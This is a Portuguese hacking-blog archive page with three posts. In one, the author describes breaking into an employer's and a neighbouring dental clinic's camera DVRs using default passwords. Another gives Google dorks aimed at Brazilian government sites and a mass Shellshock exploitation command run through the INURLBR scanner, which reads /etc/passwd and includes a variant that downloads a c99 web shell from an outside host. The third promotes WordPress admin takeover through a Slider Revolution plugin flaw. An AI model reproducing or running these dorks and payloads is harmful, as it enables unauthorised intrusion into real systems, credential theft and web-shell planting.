Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador #HACKING #INURLBR #PARROT #WORDPRESS. Mostrar todas as postagens
Mostrando postagens com marcador #HACKING #INURLBR #PARROT #WORDPRESS. Mostrar todas as postagens

quarta-feira, 28 de janeiro de 2015

O Perigo de senhas padrões

Bom dia pessoal!

 Ultimamente eu estava pensando oque você consegue fazer tendo acesso a uma rede sem fio(wi-fi) de uma empresa? hoje em dia você estando dentro de uma rede wireless sem proteção, você pode fazer praticamente case tudo! desde rodar um sniffer a realizar ataques Man-in-The-Middle dentre outros diversos tipos de ataques. Mas além disso você pode também pode obter acesso a um serviço de controle de câmeras (DVR) por exemplo. Mas oque isso tem a ver com o tema "Senhas padrões"? Vocês iram entender isso na frente.

 Esses dias eu conseguir acesso a dois serviços de controle de câmeras, um da empresa aonde eu trabalho e o outro de uma clinica dentária do lado, apenas tendo acesso a rede wireless das duas empresas.


Empresa 1 (Trabalho):


Depois de ter pego a senha do wifi, acessei normalmente o roteador e como de costume ele pede login e senha, coloquei diversos logins e senhas padrões [admin,admin] [admin,gvt12345] conseguir acesso ao roteador (Já começou a entrar no assunto do titulo!). Comecei a fuçar o roteador não conseguir encontrar nada de importante, então decidir realizar um Scanner com nmap e acabei descobrindo uma porta aberta 8090 no ip 192.168.1.150. Então acessei ip:porta e me retornou uma tela de login de DVR da intelbras! novamente fui colocando diversas senhas toscas (padrões)  e conseguir acesso ao serviço de controle de câmeras. Isto tudo foi feito com o OS Windows (porque não estava com o notebook no momento), Nmap, e senhas padrões.

   [Tela de login DVR intelbras]


[Serviço de controle de câmeras]





[Resultados nmap]





Empresa 2 (Clinica dentária):


Alguns dias depois da façanha da empresa 1, conseguir acesso a rede wireless de uma clinica dentária vizinha da empresa 1. E pensei porque não fuçar novamente? Só que essa vez usei um android (Samsung Galaxy prime rootado) para realizar o fingerprint. Para o processo de fingerprinting utilizei o aplicativo Fing  para android!



Como mostra a imagem acima, ele me retornou diversos ips. Mas apenas 2 me chamou a atenção por causa dos hostnames (ipcamera_) 192.168.1.22 e 192.168.1.33. Dae então fiz um scan nos dois ip's para descobrir se tinha algum serviço rodando nos ip's! Ele me retornou que tinha um serviço sendo executado na porta 90 do ip 192.168.1.22 e a porta 92 no ip 192.168.1.33!

            



 Logo depois decidir acessar o endereço 192.168.1.22:90, e me apareceu uma tela de autenticação coloquei novamente login e senhas padrões e para minha surpresa ele entrou:



  Depois acessei o endereço 192.168.1.33:92, também me apareceu uma tela de autentificação coloquei novamente o mesmo login e senha do primeiro ip e novamente entrou normalmente!
 
Conclusão:

 Agora me fale oque eu posso fazer tendo acesso a um serviço de controle de câmeras? deixe nos comentários!

 Nunca use senhas padrões em equipamentos eletrônicos! seja eles roteadores, dvr's, aplicativos etc...
um exemplo de ataque realizado com senhas padrões foi o da equipe Lizard Squad que (utilizava Scanners (ferramentas utilizadas para buscar algo) em máquinas potentes com objetivo de encontrar Roteadores domésticos vulneráveis, com a porta 23 (Telnet) aberta. Após a longa varredura efetuada pelo grupo, os IP's encontrados eram filtrados e provavelmente utilizados por outras ferramentas para o ataque de Brute-Force (força bruta) em massa. Esse ataque é conhecido por realizar inúmeras combinações de senhas até se encontrar a correta, e foi isso que o grupo fez... Usou das principais senhas padrões (e óbvias) para efetuar autenticação nos dispositivos, e se não bastasse, ainda os infectava com uma espécie de "Malware" que também efetuava todo o processo para encontrar cada vez mais Zumbis com objetivo de aumentar a força de seus ataques) (Trecho tirado do site infohax)
                     

terça-feira, 30 de setembro de 2014

SCANNER [ INURL BR ] + [ SHELLSHOCK ] - Exploit em massa



Eae cybers vândalos, a galera que trabalha na área de tecnologia com certeza já ouviu falar na nova vulnerabilidade que saiu "Shellshock". para mais informações sobre a falha clique no link.

 Vamos para o que importa, nossa equipe montou uma linha de comando para ser usando com nosso scanner ( SCANNER INURL BR ) para explorar essa vulnerabilidade em massa.

[ Dorks ]

DORK[0]=> site:gov.br inurl:/cgi-sys/defaultwebpage.cgi
DORK[1]=> site:.br inurl:/cgi-sys/defaultwebpage.cgi


Lista de dorks CGI ( Créditos pela lista "Takedown" )
 http://pastebin.com/7aD2uZR3 

[ 0xComando ]

php inurlbrazil.php --dork 'inurl:/cgi-sys/defaultwebpage.cgi & inurl:defaultwebpage.cgi ext:cgi' -s ../cgi.txt3 --comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'

  Explicação do comando:
  "--comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'"

No parâmetro --comand-all ele define o exploit que vai ser usado nas url que o scanner listo, que executa o comando "cat /etc/passwd" que vai jogar todas as senhas do servidor no arquivo "~/cgi-sys/inurlbr.txt" depois ele executa o curl "curl http://_TARGET_/cgi-sys/inurlbr.txt'" para fazer a leitura do arquivo inserido!


[ Variação de comando ] 
 curl -A "() { :; }; wget http://site/c99.txt;mv c99.txt c.php" http://_TARGET_/cgi-sys/defaultwebpage.cgi
 
Você pode variar o comando do exploit para se adaptar a sua vontade ou exploração.


Demo:


segunda-feira, 4 de agosto de 2014

Scanner INURLBR - Obtendo acesso ao painel do Wordpress.


Salve galera, neste video vamos demonstrar na prática uma forma de obter acesso ao painel do Wordpress, explorando a falha do plugin Slider Revolution, como foi demonstrado aqui mesmo no blog.

Se você não viu a demonstração da falha Confira Aqui

Não vou entrar em detalhes dos comandos, pois tem tudo no post acima.

No vídeo foi utilizado o sistema operacional Parrot OS, que você pode baixar por aqui e claro o Scanner INURLBR.

Não me responsabilizo pela sua má utilização, estamos apenas compartilhando conhecimento.

Até mais.